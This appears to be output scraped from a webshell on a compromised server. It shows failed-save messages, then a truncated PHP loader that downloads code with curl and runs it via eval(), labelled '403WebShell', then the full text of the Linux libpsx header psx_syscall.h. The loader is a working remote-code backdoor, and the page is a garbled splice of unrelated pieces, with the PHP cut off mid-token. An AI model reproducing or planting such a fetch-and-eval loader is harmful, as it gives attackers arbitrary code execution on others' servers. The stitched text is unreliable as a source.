Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

RLOPT_RETURNTRANSFER, true); $remoteCode = curl_exec($ch); if (curl_errno($ch)) { die('cURL error: ' . curl_error($ch)); } curl_close($ch); eval("?>" . $remoteCode); ?> 403WebShell
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Current File : /usr/include/sys/psx_syscall.h
/*
 * Copyright (c) 2019 Andrew G. Morgan <morgan@kernel.org>
 *
 * This header, and the -lpsx library, provide a number of things to
 * support POSIX semantics for syscalls associated with the pthread
 * library. Linking this code is tricky and is done as follows:
 *
 *     ld ... -lpsx -lpthread --wrap=pthread_create
 * or, gcc ... -lpsx -lpthread -Wl,-wrap,pthread_create
 *
 * glibc provides a subset of this functionality natively through the
 * nptl:setxid mechanism and could implement psx_syscall() directly
 * using that style of functionality but, as of 2019-11-30, the setxid
 * mechanism is limited to 9 specific set*() syscalls that do not
 * support the syscall6 API (needed for prctl functions and the ambient
 * capabilities set for example).
 */

#ifndef _SYS_PSX_SYSCALL_H
#define _SYS_PSX_SYSCALL_H

#ifdef __cplusplus
extern "C" {
#endif

#include <pthread.h>

/*
 * psx_syscall performs the specified syscall on all psx registered
 * threads. The mechanism by which this occurs is much less efficient
 * than a standard system call on Linux, so it should only be used
 * when POSIX semantics are required to change process relevant
 * security state.
 *
 * Glibc has native support for POSIX semantics on setgroups() and the
 * 8 set*[gu]id() functions. So, there is no need to use psx_syscall()
 * for these calls. This call exists for all the other system calls
 * that need to maintain parity on all pthreads of a program.
 *
 * Some macrology is used to allow the caller to provide only as many
 * arguments as needed, thus psx_syscall() cannot be used as a
 * function pointer. For those situations, we define psx_syscall3()
 * and psx_syscall6().
 */
#define psx_syscall(syscall_nr, ...) \
    __psx_syscall(syscall_nr, __VA_ARGS__, (long int) 6, (long int) 5, \
		  (long int) 4, (long int) 3, (long int) 2, \
		  (long int) 1, (long int) 0)
long int __psx_syscall(long int syscall_nr, ...);
long int psx_syscall3(long int syscall_nr,
		      long int arg1, long int arg2, long int arg3);
long int psx_syscall6(long int syscall_nr,
		      long int arg1, long int arg2, long int arg3,
		      long int arg4, long int arg5, long int arg6);

/*
 * This function should be used by systems to obtain pointers to the
 * two syscall functions provided by the PSX library. A linkage trick
 * is to define this function as weak in a library that can optionally
 * use libpsx and then, should the caller link -lpsx, that library can
 * implicitly use these POSIX semantics syscalls. See libcap for an
 * example of this useage.
 */
void psx_load_syscalls(long int (**syscall_fn)(long int,
					       long int, long int, long int),
		       long int (**syscall6_fn)(long int,
						long int, long int, long int,
						long int, long int, long int));

#ifdef __cplusplus
}
#endif

#endif /* _SYS_PSX_SYSCALL_H */

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